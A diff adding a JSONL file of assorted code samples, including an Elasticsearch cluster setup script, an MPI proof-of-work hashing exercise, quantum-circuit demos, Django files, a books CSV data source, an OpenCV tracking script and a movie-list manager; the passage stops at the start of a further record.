diff --git "a/2548.jsonl" "b/2548.jsonl" new file mode 100644--- /dev/null +++ "b/2548.jsonl" @@ -0,0 +1,831 @@ +{"seq_id":"367342444","text":"#!/bin/env python3.4\nfrom __future__ import print_function\nimport os,sys,socket\nimport shutil\nimport json\nimport shutil\nimport syslog\nimport time\n\nbackup_dir = '/opt/fff/backup'\ntry:\n os.makedirs(backup_dir)\nexcept:pass\n\nelasticsysconf = '/etc/sysconfig/elasticsearch'\nelasticconf = '/etc/elasticsearch/elasticsearch.yml'\nelasticconfdir = '/etc/elasticsearch'\n#elasticlogconf = '/etc/elasticsearch/logging.yml'\n\nes_cdaq_run2_list = ['ncsrv-c2e42-09-02', 'ncsrv-c2e42-11-02', 'ncsrv-c2e42-13-02', 'ncsrv-c2e42-19-02']\nes_cdaq_list = ['ncsrv-c2e42-21-02', 'ncsrv-c2e42-23-02']\nes_local_list =['ncsrv-c2e42-13-03', 'ncsrv-c2e42-23-03']\n\nes_vm_cdaq_list = ['es-vm-cdaq-01.cern.ch']\nes_vm_local_list =['es-vm-local-01.cern.ch']\n\n\nmyhost = os.uname()[1]\n\ndef getmachinetype():\n\n #print \"running on host \",myhost\n if myhost.startswith('ncsrv-'):\n try:\n es_cdaq_run2_list_ip = socket.gethostbyname_ex('es-cdaq-run2')[2]\n es_cdaq_list_ip = socket.gethostbyname_ex('es-cdaq')[2]\n es_local_list_ip = socket.gethostbyname_ex('es-local')[2]\n\n for es in es_cdaq_run2_list:\n try:\n es_cdaq_run2_list_ip.append(socket.gethostbyname_ex(es)[2][0])\n except Exception as ex:\n print(ex)\n for es in es_cdaq_list:\n try:\n es_cdaq_list_ip.append(socket.gethostbyname_ex(es)[2][0])\n except Exception as ex:\n print(ex)\n for es in es_local_list:\n try:\n es_local_list_ip.append(socket.gethostbyname_ex(es)[2][0])\n except Exception as ex:\n print(ex)\n\n myaddr = socket.gethostbyname(myhost)\n\n if myaddr in es_cdaq_run2_list_ip:\n return 'es','escdaqrun2','prod'\n if myaddr in es_cdaq_list_ip:\n return 'es','escdaq','prod'\n elif myaddr in es_local_list_ip:\n return 'es','eslocal','prod'\n else:\n return 'unknown','unknown'\n except socket.gaierror as ex:\n print('dns lookup error ',str(ex))\n raise ex\n elif myhost.startswith('es-vm-cdaq'):\n return 'es','escdaq','vm'\n elif myhost.startswith('es-vm-local'):\n return 'es','eslocal','vm'\n else:\n print(\"unknown machine type\")\n return 'unknown','unknown','unknown'\n\n\ndef getIPs(hostname):\n try:\n ips = socket.gethostbyname_ex(hostname)\n except socket.gaierror as ex:\n print('unable to get ',hostname,'IP address:',str(ex))\n raise ex\n return ips\n\ndef getTimeString():\n tzones = time.tzname\n if len(tzones)>1:zone=str(tzones[1])\n else:zone=str(tzones[0])\n return str(time.strftime(\"%H:%M:%S\"))+\" \"+time.strftime(\"%d-%b-%Y\")+\" \"+zone\n\n\ndef checkModifiedConfigInFile(file):\n\n f = open(file)\n lines = f.readlines(2)#read first 2\n f.close()\n tzones = time.tzname\n if len(tzones)>1:zone=tzones[1]\n else:zone=tzones[0]\n\n for l in lines:\n if l.strip().startswith(\"#edited by fff meta rpm\"):\n return True\n return False\n\n\n\ndef checkModifiedConfig(lines):\n for l in lines:\n if l.strip().startswith(\"#edited by fff meta rpm\"):\n return True\n return False\n\n\nclass FileManager:\n def __init__(self,fileName,sep,edited,os1='',os2='',recreate=False):\n self.name = fileName\n if recreate==False:\n f = open(fileName,'r')\n self.lines = f.readlines()\n f.close()\n else:\n self.lines=[]\n self.sep = sep\n self.regs = []\n self.remove = []\n self.edited = edited\n #for style\n self.os1=os1\n self.os2=os2\n\n def reg(self,key,val,section=None):\n self.regs.append([key,val,False,section])\n\n def removeEntry(self,key):\n self.remove.append(key)\n\n def commit(self):\n out = []\n #if 
self.edited == False:\n out.append('#edited by fff meta rpm at '+getTimeString()+'\\n')\n\n #first removing elements\n for rm in self.remove:\n for i,l in enumerate(self.lines):\n if l.strip().startswith(rm):\n del self.lines[i]\n break\n\n for i,l in enumerate(self.lines):\n lstrip = l.strip()\n if lstrip.startswith('#'):\n continue\n\n try:\n key = lstrip.split(self.sep)[0].strip()\n for r in self.regs:\n if r[0] == key:\n self.lines[i] = r[0].strip()+self.os1+self.sep+self.os2+r[1].strip()+'\\n'\n r[2]= True\n break\n except:\n continue\n for r in self.regs:\n if r[2] == False:\n toAdd = r[0]+self.os1+self.sep+self.os2+r[1]+'\\n'\n insertionDone = False\n if r[3] is not None:\n for idx,l in enumerate(self.lines):\n if l.strip().startswith(r[3]):\n try:\n self.lines.insert(idx+1,toAdd)\n insertionDone = True\n except:\n pass\n break\n if insertionDone == False:\n self.lines.append(toAdd)\n for l in self.lines:\n #already written\n if l.startswith(\"#edited by fff meta rpm\"):continue\n out.append(l)\n #print \"file \",self.name,\"\\n\\n\"\n #for o in out: print o\n f = open(self.name,'w+')\n f.writelines(out)\n f.close()\n\n\ndef restoreFileMaybe(fileName):\n try:\n try:\n f = open(fileName,'r')\n lines = f.readlines()\n f.close()\n shouldCopy = checkModifiedConfig(lines)\n except:\n #backup also if file got deleted\n shouldCopy = True\n\n if shouldCopy:\n print(\"restoring \",fileName)\n backuppath = os.path.join(backup_dir,os.path.basename(fileName))\n f = open(backuppath)\n blines = f.readlines()\n f.close()\n if checkModifiedConfig(blines) == False and len(blines)>0:\n shutil.move(backuppath,fileName)\n except Exception as ex:\n print(\"restoring problem: \" , ex)\n pass\n\n#main function\nif __name__ == \"__main__\":\n if len(sys.argv)>1:\n if 'restore'==sys.argv[1]:\n print(\"restoring configuration...\")\n restoreFileMaybe(elasticsysconf)\n restoreFileMaybe(elasticconf)\n sys.exit(0)\n\n cluster,type,env = getmachinetype()\n\n if type == \"escdaqrun2\":\n print(\"ERROR: this should NEVER be installed or run on es-cdaq-run2 cluster! 
Exiting script.\")\n exit(1)\n\n print(\"running configuration for machine\",os.uname()[1],\"of type\",type,\"in cluster\",cluster)\n\n\n if True:\n\n if env==\"vm\":\n es_publish_host=os.uname()[1]\n else:\n es_publish_host=os.uname()[1]+'.cms'\n\n #print \"will modify sysconfig elasticsearch configuration\"\n #maybe backup vanilla versions\n essysEdited = checkModifiedConfigInFile(elasticsysconf)\n if essysEdited == False:\n #print \"elasticsearch sysconfig configuration was not yet modified\"\n shutil.copy(elasticsysconf,os.path.join(backup_dir,os.path.basename(elasticsysconf)))\n\n esEdited = checkModifiedConfigInFile(elasticconf)\n if esEdited == False:\n shutil.copy(elasticconf,os.path.join(backup_dir,os.path.basename(elasticconf)))\n\n if type == 'eslocal' or type == 'escdaq':\n\n essyscfg = FileManager(elasticsysconf,'=',essysEdited)\n essyscfg.reg('ES_PATH_CONF','/etc/elasticsearch')\n if env=='vm':\n essyscfg.reg('ES_JAVA_OPTS','\"-Xms1G -Xmx1G\"')\n else:\n essyscfg.reg('ES_JAVA_OPTS','\"-Xms30G -Xmx30G\"') #-XX:+PrintFlagsFinal to print all parameters at startup\n #essyscfg.reg('DATA_DIR','/elasticsearch/lib/elasticsearch')\n essyscfg.removeEntry('CONF_FILE')\n essyscfg.removeEntry('ES_HEAP_SIZE')\n essyscfg.commit()\n os.chmod(elasticsysconf,0o664) #fix permissions (readable)\n\n if type == 'eslocal':\n escfg = FileManager(elasticconf,':',esEdited,'',' ',recreate=True)\n escfg.reg('network.publish_host',es_publish_host)\n escfg.reg('network.bind_host','_local_,'+es_publish_host)\n escfg.reg('cluster.name','es-local')\n #escfg.reg('discovery.zen.ping.unicast.hosts',json.dumps(es_local_list))\n escfg.reg('node.master','true')\n escfg.reg('node.data','true')\n escfg.reg('path.logs','/var/log/elasticsearch')\n #escfg.reg('path.data','/elasticsearch/lib/elasticsearch')\n escfg.reg('path.data','/elasticsearch/lib/elasticsearch/es-local')\n escfg.reg('http.cors.enabled','true')\n escfg.reg('http.cors.allow-origin','\"*\"')\n escfg.reg('bootstrap.system_call_filter','false')\n escfg.reg('transport.compress','true')\n escfg.reg('script.max_compilations_rate', '10000/1m')\n escfg.reg('cluster.routing.allocation.disk.watermark.low','92%')\n escfg.reg('cluster.routing.allocation.disk.watermark.high','95%')\n\n #other optimizations:\n #if env!='vm':\n escfg.reg(\"indices.recovery.max_bytes_per_sec\",\"100mb\") #default:40mb\n escfg.reg('thread_pool.write.queue_size','3000') #default:50(?)\n escfg.reg('cluster.routing.allocation.node_concurrent_recoveries','5') #default:2\n escfg.reg('cluster.routing.allocation.node_initial_primaries_recoveries', '5') #default:4\n #escfg.reg('index.translog.flush_threshold_size','4g') #default:512 mb, only es-local,must be template\n #7.0 settings\n #escfg.reg('node.name',myhost)\n if env=='vm':\n escfg.reg('discovery.seed_hosts',json.dumps(es_vm_local_list))\n escfg.reg('cluster.initial_master_nodes',json.dumps(es_vm_local_list))\n else:\n escfg.reg('discovery.seed_hosts',json.dumps(es_local_list))\n escfg.reg('cluster.initial_master_nodes',json.dumps(es_local_list))\n\n escfg.reg('cluster.max_shards_per_node','100000')\n escfg.reg('search.max_buckets','1000000')\n escfg.commit()\n \n #modify logging.yml --> TODO: adjust /etc/elasticsearch/log4j2.properties\n #eslogcfg = FileManager(elasticlogconf,':',esEdited,'',' ')\n #eslogcfg.reg('es.logger.level','INFO')\n #eslogcfg.commit()\n\n if type == 'escdaq':\n escfg = FileManager(elasticconf,':',esEdited,'',' ',recreate=True)\n escfg.reg('network.publish_host',es_publish_host)\n 
escfg.reg('network.bind_host','_local_,'+es_publish_host)\n            escfg.reg('cluster.name','es-cdaq')\n            #escfg.reg('discovery.zen.ping.unicast.hosts',json.dumps(es_cdaq_list))\n            escfg.reg('node.master','true')\n            escfg.reg('node.data','true')\n            escfg.reg('path.logs','/var/log/elasticsearch')\n            #escfg.reg('path.data','/elasticsearch/lib/elasticsearch')\n            escfg.reg('path.data','/elasticsearch/lib/elasticsearch/es-cdaq')\n            escfg.reg('http.cors.enabled','true')\n            escfg.reg('http.cors.allow-origin','\"*\"')\n            #AUTH\n            escfg.reg('xpack.security.enabled', 'true')\n            escfg.reg('xpack.security.transport.ssl.enabled', 'true')\n            escfg.reg('xpack.security.transport.ssl.verification_mode', 'certificate')\n            escfg.reg('xpack.security.transport.ssl.keystore.path', 'certs/elastic-certificates.p12')\n            escfg.reg('xpack.security.transport.ssl.truststore.path', 'certs/elastic-certificates.p12')\n            #escfg.reg('xpack.security.authc.anonymous.roles','[\"superuser\",\"read_anon\",\"write_anon_temp\"]') #permissive\n            escfg.reg('xpack.security.authc.anonymous.roles','[\"read_anon\",\"write_anon_temp\"]') #permissive\n            escfg.reg('xpack.security.authc.anonymous.authz_exception','true')\n\n            escfg.reg('bootstrap.system_call_filter','false')\n            escfg.reg('transport.compress','true')\n            escfg.reg('action.auto_create_index','.watches,.triggered_watches,.watcher-history-*,.marvel-*')\n            escfg.reg('script.max_compilations_rate', '10000/1m')\n            escfg.reg(\"action.destructive_requires_name\", 'true')\n            escfg.reg('cluster.routing.allocation.disk.watermark.low','92%')\n            escfg.reg('cluster.routing.allocation.disk.watermark.high','95%')\n\n            #if env!='vm':\n            escfg.reg(\"indices.recovery.max_bytes_per_sec\",\"100mb\") #default:40mb\n            escfg.reg('thread_pool.write.queue_size','3000') #default:50 (?)\n            escfg.reg('cluster.routing.allocation.node_concurrent_recoveries','5') #default:2\n            escfg.reg('cluster.routing.allocation.node_initial_primaries_recoveries', '5') #default:4\n            #7.0 settings\n            #escfg.reg('node.name',myhost)\n            if env=='vm':\n                escfg.reg('discovery.seed_hosts',json.dumps(es_vm_cdaq_list))\n                escfg.reg('cluster.initial_master_nodes',json.dumps(es_vm_cdaq_list))\n            else:\n                escfg.reg('discovery.seed_hosts',json.dumps(es_cdaq_list))\n                escfg.reg('cluster.initial_master_nodes',json.dumps(es_cdaq_list))\n\n            escfg.reg('cluster.max_shards_per_node','10000')\n            escfg.reg('search.max_buckets','1000000')\n            escfg.commit()\n            #copy auth config\n            shutil.copy2(os.path.join(elasticconfdir,'users.f3'), os.path.join(elasticconfdir,'users'))\n            shutil.copy2(os.path.join(elasticconfdir,'users_roles.f3'), os.path.join(elasticconfdir,'users_roles'))\n            shutil.copy2(os.path.join(elasticconfdir,'roles.yml.f3'), os.path.join(elasticconfdir,'roles.yml'))\n\n","sub_path":"python/essetupmachine.py","file_name":"essetupmachine.py","file_ext":"py","file_size_in_byte":14196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"646900615","text":"import sys\nimport hashlib\nfrom mpi4py import MPI\n\nbloco = {\n    'tansacoes': [\n        'marcio->tarik:1000 BTC', \n        'tarik->breno:50 BTC',\n        'felipe->marcio:10 BTC',\n        'marcio->tarik:10 BTC',\n        'marcio->marcio:20 BTC',\n    ],\n    'id': 1256,\n    'nounce': 0\n}\n\ntempo_ini = MPI.Wtime()\n\ncomm = MPI.COMM_WORLD\nmeu_id = comm.Get_rank()\nqtd_processos = comm.Get_size()\n\nbloco['id'] = sys.argv[1] #To produce random hashes for blocks with ids passed in via bash\nqtd_zeros = int(sys.argv[2])\nqtd_testar_total = int(sys.argv[3])\n\nqtd_testar_local = qtd_testar_total // qtd_processos # The range of nounces that each process will test\nnounce_ini = meu_id*qtd_testar_local # The first nounce of the range\nnounce_fin = (meu_id + 1)*qtd_testar_local # The last nounce of the range\n\nprint(\"Sou o processo\", meu_id, \"e vou testar de\", nounce_ini, \"até\", nounce_fin)\n\nbloco_hash = hashlib.sha256((str(bloco)).encode()).hexdigest()\nif meu_id == 0:\n    print(\"Hash inicial\", bloco_hash)\n\n#Running the tests on the respective ranges\nnounce = nounce_ini\nencontrado = False\nid_quem_achou = -1\ncontador = 0\nwhile nounce < nounce_fin and not encontrado:\n    bloco['nounce'] = nounce\n    bloco_hash = hashlib.sha256((str(bloco)).encode()).hexdigest()\n    nounce += 1\n    \n    contador += 1\n    \n    #Doing the iprobe only every 1000 iterations, since it is slow\n    if contador == 1000:\n        encontrado = comm.iprobe(source=MPI.ANY_SOURCE, tag=0)\n        contador = 0\n    \n    if bloco_hash[0:qtd_zeros] == '0'*qtd_zeros:\n        encontrado = True\n        id_quem_achou = meu_id\n    \n    #If the process finished the tests on its nounce range without success,\n    #it starts testing a new range\n    if nounce == nounce_fin:\n        nounce_ini = nounce_ini + qtd_testar_total\n        nounce = nounce_ini\n        nounce_fin = nounce_ini + qtd_testar_local\n        #print(\"\\nSou o processo\", meu_id, \"e não encontrei nada na faixa anterior\")\n        #print(\"agora vou verificar de\", nounce, \"até\", nounce_fin) \n\nif encontrado and meu_id == id_quem_achou:\n    print(\"O processo\", meu_id, \"encontrou a prova de trabalho\")\n    print(\"Prova de trabalho\", bloco['nounce'])\n    \n    tempo_fim = MPI.Wtime()\n    \n    #Telling the other processes that the hash was found\n    for i in range(qtd_processos):\n        comm.isend(encontrado, dest=i, tag=0)\n    \n#Synchronizing so that the elapsed time can always be placed in the last\n#position of the list that will be used in the colab notebook that runs\n#this code\ncomm.Barrier()\nif meu_id == id_quem_achou:\n    print(\"Tempo de execução:\", tempo_fim - tempo_ini)\n    \n    \n","sub_path":"parallel_pow.py","file_name":"parallel_pow.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"134392278","text":"# (C) Copyright Artificial Brain 2021.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#    http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom quantumcat.circuit import QCircuit\nfrom quantumcat.utils import providers, constants\nfrom quantumcat.algorithms import GroversAlgorithm\nfrom quantumcat.applications.generator import RandomNumber\nfrom quantumcat.applications.generator import RandInt\n\ndef create_circuit_demo():\n    circuit = QCircuit(6)\n    circuit.h_gate(0)\n    circuit.x_gate(3)\n    circuit.measure_all()\n    # circuit.draw_circuit(provider=providers.IBM_PROVIDER)\n    print(circuit.execute(provider=providers.IBM_PROVIDER, repetitions=10))\n\n\ndef grovers_demo():\n    clause_list_sudoku = [[0, 1], [0, 2], [1, 3], [2, 3]]\n    clause_list_light_board = [[0, 1, 3], [1, 0, 2, 4], [2, 1, 5], [3, 0, 4, 6],\n                               [4, 1, 3, 5, 7], [5, 2, 4, 8], [6, 3, 7], [7, 4, 6, 8],\n                               [8, 5, 7]]\n\n    input_arr = [0, 0, 0, 1, 0, 1, 1, 1, 
0]\n\n grovers_algorithm_unknown_solution = GroversAlgorithm(clause_list=clause_list_light_board, input_arr=input_arr,\n flip_output=True, solution_known='N')\n\n grovers_algorithm_known_solution = GroversAlgorithm(solution_known='Y', search_keyword=101)\n\n results = grovers_algorithm_unknown_solution.execute(repetitions=10, provider=providers.IBM_PROVIDER)\n\n # grovers_algorithm_unknown_solution.draw_grovers_circuit()\n print(results)\n\n\ndef random_number_demo():\n random_number = RandInt(provider=providers.GOOGLE_PROVIDER).rand_range(7,11)\n print(random_number)\n\n\ndef run_on_real_device():\n circuit = QCircuit(1)\n circuit.x_gate(0)\n circuit.measure_all()\n # circuit.draw_circuit(provider=providers.GOOGLE_PROVIDER)\n print(circuit.execute(provider=providers.IBM_PROVIDER, repetitions=10,\n api=constants.IBM_API, device=constants.IBM_DEVICE_NAME))\n\n\nif __name__ == '__main__':\n random_number_demo()\n","sub_path":"quantumcat/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"336498371","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport trippie.utils\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('trips', '0053_auto_20160901_1454'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='tripimagetmp',\n name='image',\n field=models.ImageField(upload_to=trippie.utils.image_path, verbose_name='Image'),\n ),\n ]\n","sub_path":"apps/trips/migrations/0054_auto_20161018_1442.py","file_name":"0054_auto_20161018_1442.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"249427934","text":"#!/usr/bin/env python3\n'''\n booksdatasource.py\n 10/11/2021\n\n Simon Hempel-Costello, Anders Shenholm\n Revised by Simon Hempel-Costello\n'''\n\n\nimport csv\n\nclass Author:\n\n def __init__(self, surname='', given_name='', birth_year=None, death_year=None):\n self.surname = surname\n self.given_name = given_name\n self.birth_year = birth_year\n self.death_year = death_year\n\n def __eq__(self, other):\n ''' For simplicity, we're going to assume that no two authors have the same name. '''\n return self.surname == other.surname and self.given_name == other.given_name\n\n #basic string formatting for the printouts to make my life easy\n def __str__(self) -> str:\n return self.surname + \",\" + self.given_name + \",(\" +str(self.birth_year) + \"-\"+ str(self.death_year) +\")\"\n\n def __repr__(self) -> str:\n return self.__str__()\n\n def given_name(self):\n return self.given_name\n\n def birth_year(self):\n return self.birth_year\n\n def death_year(self):\n return self.death_year\n\n def surname(self):\n return self.surname\n\nclass Book:\n\n def __init__(self, title='', publication_year=None, authors=[]):\n ''' Note that the self.authors instance variable is a list of\n references to Author objects. '''\n self.title = title\n self.publication_year = publication_year\n self.authors = authors\n\n def __eq__(self, other):\n ''' We're going to make the excessively simplifying assumption that\n no two books have the same title, so \"same title\" is the same\n thing as \"same book\". 
'''\n return self.title == other.title\n\n #basic string formatting for printouts\n def __str__(self) -> str:\n return self.title + \",\" + str(self.publication_year) + \",Author(s):\" + str(self.authors)\n\n def __repr__(self) -> str:\n return self.__str__()\n\n def title(self):\n return self.title\n\n def authors(self):\n return self.authors\n\n def publication_year(self):\n return self.publication_year\n\nclass BooksDataSource:\n\n def __init__(self, books_csv_file_name):\n ''' The books CSV file format looks like this:\n\n title,publication_year,author_description\n\n For example:\n\n All Clear,2010,Connie Willis (1945-)\n \"Right Ho, Jeeves\",1934,Pelham Grenville Wodehouse (1881-1975)\n\n This __init__ method parses the specified CSV file and creates\n suitable instance variables for the BooksDataSource object containing\n a collection of Author objects and a collection of Book objects.\n '''\n #Read in csv file and input it into the two lists\n self.book_list = []\n self.author_list = []\n with open(books_csv_file_name) as file:\n csvreader = csv.reader(file)\n for row in csvreader:\n #take each author entry in the csv file and parse it into a list of authors dealing with the potential for ands\n input_authors = self.parse_authors_from_csv_entry(row[2])\n for a in input_authors:\n if(a not in self.author_list):\n self.author_list.append(a)\n #create a book from the other two parts of the csv, and feed it the list generated from the authors\n input_book = Book(row[0],int(row[1]),input_authors)\n #add the book to the book list\n self.book_list.append(input_book)\n pass\n\n def parse_authors_from_csv_entry(self, input_entry):\n and_substring = ' and '\n and_offset = len(and_substring)\n author_list = []\n if and_substring in input_entry:\n pre_and_substring = input_entry[:input_entry.index(and_substring)]\n post_and_substring = input_entry[input_entry.index(and_substring) + and_offset:]\n #Now we have isolated one author in prestring, generate an author object from this string\n pre_string_author = self.author_from_string(pre_and_substring)\n author_list.append(pre_string_author)\n #Check if post string contains multiple authors, if so recursively splice it into 1, else, just add it to the list\n if(and_substring in post_and_substring):\n author_list.extend(self.parse_authors_from_csv_entry(post_and_substring))\n else:\n post_string_author = self.author_from_string(post_and_substring)\n author_list.append(post_string_author)\n else:\n input_author = self.author_from_string(input_entry)\n\n author_list.append(input_author)\n return author_list\n\n def author_from_string(self, input_string):\n #parsing based on dileneation of spaces, parenthesis and dashes\n last_name = input_string[input_string.index(\" \")+1:input_string.index(\"(\")-1]\n first_name = input_string[:input_string.index(\" \")]\n birth_date = input_string[input_string.index(\"(\")+1 : input_string.index(\"-\")]\n death_date = input_string[input_string.index(\"-\")+1 : input_string.index(\")\")]\n author = Author(surname = last_name, given_name = first_name, birth_year = birth_date, death_year = death_date)\n return author\n\n def authors(self, search_text=None):\n ''' Returns a list of all the Author objects in this data source whose names contain\n (case-insensitively) the search text. If search_text is None, then this method\n returns all of the Author objects. In either case, the returned list is sorted\n by surname, breaking ties using given name (e.g. 
Ann Brontë comes before Charlotte Brontë).\n '''\n #take your input text\n input_text = ''\n if(search_text!=None):\n input_text = search_text.lower()\n\n output_list = []\n for a in self.author_list:\n full_name = a.given_name.lower() + a.surname.lower()\n #check if the name is this full name\n if(input_text in full_name):\n output_list.append(a)\n\n #okay this is kinda jank, but it seems to work. We just sort the author list by given names first and, \n #since the python sorting algorithm seems to try and maintain relative order when sorting by surname, \n # those with a earlier given name are put first, without any real work on my part. \n #I realize that on a O(n) level, it is probably a terrible method, and there is almost definitely some edge case where it doesn't work\n #but until then im keeping it\n output_list = sorted(output_list, key = lambda author:(author.surname, author.given_name))\n return output_list\n\n def books(self, search_text=None, sort_by='title'):\n ''' Returns a list of all the Book objects in this data source whose\n titles contain (case-insensitively) search_text. If search_text is None,\n then this method returns all of the books objects.\n\n The list of books is sorted in an order depending on the sort_by parameter:\n\n 'year' -- sorts by publication_year, breaking ties with (case-insenstive) title\n 'title' -- sorts by (case-insensitive) title, breaking ties with publication_year\n default -- same as 'title' (that is, if sort_by is anything other than 'year'\n or 'title', just do the same thing you would do for 'title')\n '''\n input_text = ''\n if(search_text!=None):\n input_text = search_text.lower()\n output_list = []\n for b in self.book_list:\n title = b.title.lower()\n if(input_text in title):\n output_list.append(b)\n #sorting books by title or by year given the tag\n if(sort_by == \"year\"):\n output_list = sorted(output_list, key = Book.publication_year)\n else:\n output_list = sorted(output_list, key = Book.title)\n return output_list \n\n def books_between_years(self, start_year=None, end_year=None):\n ''' Returns a list of all the Book objects in this data source whose publication\n years are between start_year and end_year, inclusive. The list is sorted\n by publication year, breaking ties by title (e.g. Neverwhere 1996 should\n come before Thief of Time 1996).\n\n If start_year is None, then any book published before or during end_year\n should be included. If end_year is None, then any book published after or\n during start_year should be included. 
If both are None, then all books\n            should be included.\n        '''\n        end_date = 1000000 #placeholder future year\n        start_date = -1000000 #placeholder past year\n\n        #sanitize to make sure we are getting dates, then convert to integers\n        try:\n            if(end_year != None):\n                end_date = int(end_year)\n            if(start_year != None):\n                start_date = int(start_year)\n        except ValueError:\n            raise ValueError(\"Dates must be entered as integer years\")\n        if(start_date>end_date):\n            raise ValueError(\"Start date must be before end date\")\n        output_list = []\n        for b in self.book_list:\n            #if its within those two dates, add it to the list\n            if(b.publication_year>= start_date and b.publication_year <= end_date):\n                output_list.append(b)\n        output_list = sorted(output_list, key= lambda book: (book.publication_year, book.title)) \n        return output_list\n\n    def search_books_by_author(self, author):\n        output_list = []\n        for b in self.all_books():\n            if(author in b.authors):\n                output_list.append(b.title)\n        return output_list\n\n    def all_books(self):\n        return self.book_list\n\n    def all_authors(self):\n        return self.author_list\n\n","sub_path":"books/booksdatasource.py","file_name":"booksdatasource.py","file_ext":"py","file_size_in_byte":9969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"164321673","text":"from django.conf.urls import url\n\nfrom views import (\n    home_view,\n    profile_view,\n    )\n\nurlpatterns = [\n    url(\n        r'^$',\n        home_view,\n        name='home'),\n    url(\n        r'^(?P[-\\w\\d]+)$',\n        profile_view,\n        name='profile'),\n    ]\n","sub_path":"newsfeed/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"612182560","text":"import cv2\nimport time\nimport sys\nfrom imutils.video import FPS\nimport os\nimport numpy as np\nimport re\n\nclass VirtualStream:\n    def __init__(self, numpyFolder):\n        self.folder = numpyFolder\n        self.np_images = {}\n        for image in os.listdir(self.folder):\n            if '.npy' in image:\n                path = os.path.join(self.folder, image)\n                self.np_images[int(re.search(r'\\d+', image).group())] = path\n        self.count = 200\n        self.end = len(self.np_images) - 1\n    \n    def grabImage(self):\n        image = np.load(self.np_images[self.count])\n        self.count += 1\n        if self.count >= self.end:\n            self.reset()\n        return image\n    \n    def reset(self):\n        self.count = 0\n\n\n\n\n\n\ntestData = True\n\n# get video source\ndef getVideo():\n    try:\n        vs = cv2.VideoCapture(sys.argv[1])\n    except IndexError:\n        print(\"ERROR: Path to video missing from argument\")\n        sys.exit()\n    return vs\n\n\n#tracker = cv2.TrackerKCF_create() # openCV tracker api to track objects (specifically KCF tracker)\nroi = None # initialize box used to highlight objects\nfps = None # initialize fps of video\n\nif testData != True:\n    videoStream = getVideo()\nelse:\n    vs = VirtualStream('/Users/user/Desktop/saved_images_2019_6_13-17_49_52')\n\nwhile True:\n    # grab new frame\n    if testData != True:\n        bool_result, frame = videoStream.read()\n    else:\n        frame = vs.grabImage()\n        bool_result = True\n\n    \n\n    if not bool_result: # no more frames (read() returns False at the end of the stream)\n        break\n\n    if roi == None: # initialize roi\n        roi = cv2.selectROI(\"Frame\", frame, fromCenter = False, showCrosshair = True)\n        tracker = cv2.TrackerKCF_create()\n        test = tracker.init(frame, roi)\n        print('roi initialized correctly:',test)\n        fps = FPS().start() # currently not being used\n    else: # update roi\n        bool_updated, box = tracker.update(frame)\n        if bool_updated == True:\n            (x, y, w, h) = [int(i) for i in box] 
# box holds new roi coordinates\n            pt1 = (x,y)\n            pt2 = (x+w, y+h)\n            cv2.rectangle(frame, pt1, pt2, (0,255,0), 2)\n        if bool_updated == False:\n            roi = None\n            cv2.destroyAllWindows()\n            continue\n    \n    # we are not currently accounting for the case when update is false\n    # this happens when the object is no longer found\n    # ex: object has left frame\n\n    fps.update()\n    fps.stop()\n\n    # display frame with roi\n    cv2.imshow('frame', frame)\n    key = cv2.waitKey(1) & 0xFF # issue here is that frames are displayed for 1ms... we dont display majority of frames\n\n    if key == ord('a'):\n        # this is where we will add the code to add a new roi\n        pass\n\n    if key == ord('q'):\n        break\n\ncv2.destroyAllWindows()\n\n\n\n\n","sub_path":"sketches/Tracking/tracking.py","file_name":"tracking.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"200819444","text":"import os\r\nimport json\r\nimport logging\r\n\r\nCUR_DIR = os.path.dirname(__file__)\r\nDATA_FILE = os.path.join(CUR_DIR, \"data\",\"movies.json\")\r\n\r\ndef get_movies():\r\n    with open(DATA_FILE,\"r\") as f:\r\n        movies_title = json.load(f)\r\n\r\n    movies = [Movie(movie_title) for movie_title in movies_title]\r\n    return movies\r\n\r\nclass Movie:\r\n    def __init__(self,title):\r\n        # .title() is the feature that capitalizes each word\r\n        self.title = title.title()\r\n\r\n    # Returns the title instead of the memory address of (m)\r\n    def __str__(self):\r\n        return self.title\r\n\r\n    def _get_movies(self):\r\n        with open(DATA_FILE,\"r\") as f:\r\n            return json.load(f)\r\n\r\n    def _write_movies(self, movies):\r\n        with open(DATA_FILE,\"w\") as f:\r\n            json.dump(movies, f, indent=4)\r\n\r\n    def add_to_movies(self):\r\n        movies = self._get_movies()\r\n\r\n        if self.title not in movies:\r\n            movies.append(self.title)\r\n            self._write_movies(movies)\r\n            return True\r\n        else: \r\n            logging.warning(f\"Le film {self.title} est déjà enregistré.\")\r\n            return False\r\n\r\n    def remove_from_movies(self):\r\n        movies = self._get_movies()\r\n\r\n        if self.title in movies:\r\n            movies.remove(self.title)\r\n            self._write_movies(movies)\r\n        \r\n\r\n\r\nif __name__ == \"__main__\":\r\n    movies = get_movies()\r\n    print(movies)\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"movie.py","file_name":"movie.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"497674618","text":"# 